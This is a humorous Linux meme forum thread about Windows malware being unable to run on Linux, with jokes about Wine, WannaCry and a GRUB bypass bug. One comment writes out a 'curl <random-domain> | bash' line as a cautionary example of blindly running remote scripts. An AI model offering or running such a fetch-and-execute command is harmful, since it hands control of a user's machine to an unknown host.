this post was submitted on 28 Feb 2025
1073 points (99.1% liked)

linuxmemes

24254 readers
1413 users here now

Hint: :q!


Sister communities:


Community rules (click to expand)

1. Follow the site-wide rules

2. Be civil
  • Understand the difference between a joke and an insult.
  • Do not harrass or attack users for any reason. This includes using blanket terms, like "every user of thing".
  • Don't get baited into back-and-forth insults. We are not animals.
  • Leave remarks of "peasantry" to the PCMR community. If you dislike an OS/service/application, attack the thing you dislike, not the individuals who use it. Some people may not have a choice.
  • Bigotry will not be tolerated.
  • 3. Post Linux-related content
  • Including Unix and BSD.
  • Non-Linux content is acceptable as long as it makes a reference to Linux. For example, the poorly made mockery of sudo in Windows.
  • No porn, no politics, no trolling or ragebaiting.
  • 4. No recent reposts
  • Everybody uses Arch btw, can't quit Vim, <loves/tolerates/hates> systemd, and wants to interject for a moment. You can stop now.
  • 5. πŸ‡¬πŸ‡§ Language/язык/Sprache
  • This is primarily an English-speaking community. πŸ‡¬πŸ‡§πŸ‡¦πŸ‡ΊπŸ‡ΊπŸ‡Έ
  • Comments written in other languages are allowed.
  • The substance of a post should be comprehensible for people who only speak English.
  • Titles and post bodies written in other languages will be allowed, but only as long as the above rule is observed.
  • 6. (NEW!) Regarding public figuresWe all have our opinions, and certain public figures can be divisive. Keep in mind that this is a community for memes and light-hearted fun, not for airing grievances or leveling accusations.
  • Keep discussions polite and free of disparagement.
  • We are never in possession of all of the facts. Defamatory comments will not be tolerated.
  • Discussions that get too heated will be locked and offending comments removed.
  • Β 

    Please report posts and comments that break these rules!


    Important: never execute code or follow advice that you don't understand or can't verify, especially here. The word of the day is credibility. This is a meme community -- even the most helpful comments might just be shitposts that can damage your system. Be aware, be smart, don't remove France.

    founded 2 years ago
    MODERATORS
     
    top 50 comments
    sorted by: hot top controversial new old
    [–] [email protected] 172 points 1 month ago (2 children)

    This is were WINE comes handy /s

    [–] [email protected] 67 points 1 month ago (17 children)
    [–] [email protected] 30 points 1 month ago

    WannaCry is believed to use the EternalBlue exploit, which was developed by the U.S. National Security Agency (NSA)to attack computers running Microsoft Windows operating systems.

    Hehe

    [–] [email protected] 19 points 1 month ago* (last edited 1 month ago) (1 children)

    now im really tempted to try it, we have a decryptor now dont we?

    inb4 decryptor: borked

    [–] [email protected] 38 points 1 month ago* (last edited 1 month ago)

    What works

    Encryption - Yes

    GUI - Yes

    What does not

    SMB & Network replication does not always work, may require SMB network patch.

    See: Misc Things to configure (Samba Shares)

    Some Font rendering issues.

    What was not tested

    Decryption

    Ransom Payment

    Uh oh. And giving it "platinum" even though some stuff doesn't work and basic features weren't tested is bullshit. I demand a retraction!

    load more comments (15 replies)
    [–] [email protected] 13 points 1 month ago

    Virus running in wine: "WTF is this place. It's familiar, but it's all wrong!"

    [–] [email protected] 132 points 1 month ago (1 children)
    [–] [email protected] 17 points 1 month ago (4 children)

    Why does your admin account look like a scrotum?

    [–] [email protected] 13 points 1 month ago

    Yours doesn’t?

    [–] [email protected] 7 points 1 month ago

    it's where the power is stored

    [–] [email protected] 7 points 1 month ago

    Maybe because scratching an itch there is generally seen as a bad move if you don't know what you're doing.

    load more comments (1 replies)
    [–] [email protected] 127 points 1 month ago* (last edited 1 month ago) (9 children)

    ... and yet some of the same people will readily copy-paste random shell scripts into their terminal without fully understanding them.

    [–] [email protected] 91 points 1 month ago (1 children)

    But a forum post said it would fix my issue.

    [–] [email protected] 37 points 1 month ago (1 children)

    I feel like there's some truth to this!

    If the posted answer was in a moderately active thread, you can generally assume it's correct if there are no contradictory replies.

    [–] [email protected] 29 points 1 month ago

    If the thread has been dead a few weeks, they could edit their post. Or if it pulls a objects, those objects could change.

    [–] [email protected] 47 points 1 month ago (1 children)

    Raises hand I might be some people πŸ₯Ί

    [–] [email protected] 9 points 1 month ago

    There's some people in all of us

    [–] [email protected] 33 points 1 month ago* (last edited 1 month ago)
    curl gu5usgugiv.lol | bash || curl get.k3s.io | bash
    

    Someone did something similar to this with a fake brew package manager page. They paid Google to put it on the front page.

    [–] [email protected] 12 points 1 month ago

    Let me open up my Linux bible and see if its malicious

    load more comments (5 replies)
    [–] [email protected] 82 points 1 month ago

    Wine automatically running:

    [–] [email protected] 55 points 1 month ago (2 children)

    A friend of mine once downloaded something malicious to his Linux machine and wasn't worried about it. Then some time later, while browsing his files from a Windows machine, saw it and was like, "hey, what's this?" Oops.

    He's a tech savvy guy, so I'm guessing the fact he had downloaded it himself really let his guard down.

    [–] [email protected] 62 points 1 month ago

    That's why you don't store your stool samples in the same fridge as your chocolate pudding. Malware goes into the vault.

    [–] [email protected] 27 points 1 month ago

    That's another reason not to dual boot. Ditch Windows.

    [–] [email protected] 48 points 1 month ago (3 children)

    Modern viruses check the os before deciding which type of file to send your way.

    [–] [email protected] 58 points 1 month ago (20 children)

    This is why you use a user agent switcher to lie about being windows. It's a form of anti malware!

    load more comments (20 replies)
    [–] [email protected] 10 points 1 month ago* (last edited 1 month ago) (1 children)

    Do you have any data to back up that claim? I don't think that's true at all, it would be very rare.

    [–] [email protected] 6 points 1 month ago* (last edited 1 month ago) (6 children)

    Do you have any data to back up that claim?

    None whatsoever.

    I don’t think that’s true at all, it would be very rare.

    Suspicious words. You have one, don't you? Don't worry, I won't tell.

    load more comments (6 replies)
    [–] [email protected] 9 points 1 month ago (1 children)

    Pick the least POSIX shell, or roll your own!

    [–] [email protected] 13 points 1 month ago (1 children)

    Rename all the coreutils. Confuse yourself and the hackers!

    load more comments (1 replies)
    [–] [email protected] 37 points 1 month ago (1 children)

    It does if you right click it and run with wine or whatever it says

    [–] [email protected] 9 points 1 month ago (1 children)

    in mint cinnamon it still has no power, wine is not in the context menu or program list!

    [–] [email protected] 8 points 1 month ago (2 children)

    ...by default. You could always add it.

    load more comments (2 replies)
    [–] [email protected] 23 points 1 month ago

    And then it starts running because you set up wine with binfmt_misc, only to crash a few seconds later

    [–] [email protected] 19 points 1 month ago (9 children)

    Remember that time, when it was possible for about 6 years to hack into any Linux system (without drive encryption) which had GRUB by pressing backspace exactly 28 times? Yeah, good old times.

    https://www.hmarco.org/bugs/CVE-2015-8370-Grub2-authentication-bypass.html

    [–] [email protected] 16 points 1 month ago

    If the adversary has physical access you are generally pwned either way

    [–] [email protected] 8 points 1 month ago

    That's hyperbole. Such a system can be "hacked" by simply plugging in a usb-stick and booting from that instead, or dozens of other ways.

    The only reason to use GRUB authentication I can think of would be in something like a kiosk.

    [–] [email protected] 5 points 1 month ago

    Yeah that is not really an "OMG" vulnerability as I can also get into that machine by booting it with a USB drive, or plugging it's drove into my own machine.

    [–] [email protected] 5 points 1 month ago

    Does anyone here use GRUB authentication? If so why? What's your threat model?

    load more comments (5 replies)
    [–] [email protected] 13 points 1 month ago (2 children)

    This has given me a horrendous idea involving a Windows batch file and a weird shebang

    [–] [email protected] 8 points 1 month ago

    you're not the first. there absolutely are multiplatform launcher scripts. i have used one for installers a few years ago.

    load more comments (1 replies)
    [–] [email protected] 6 points 1 month ago

    The virgin bin vs the chad .exe

    [–] [email protected] 5 points 1 month ago

    Well if the exe was in a bottle it would be dangerous.

    https://usebottles.com/ :D

    load more comments
    view more: next β€Ί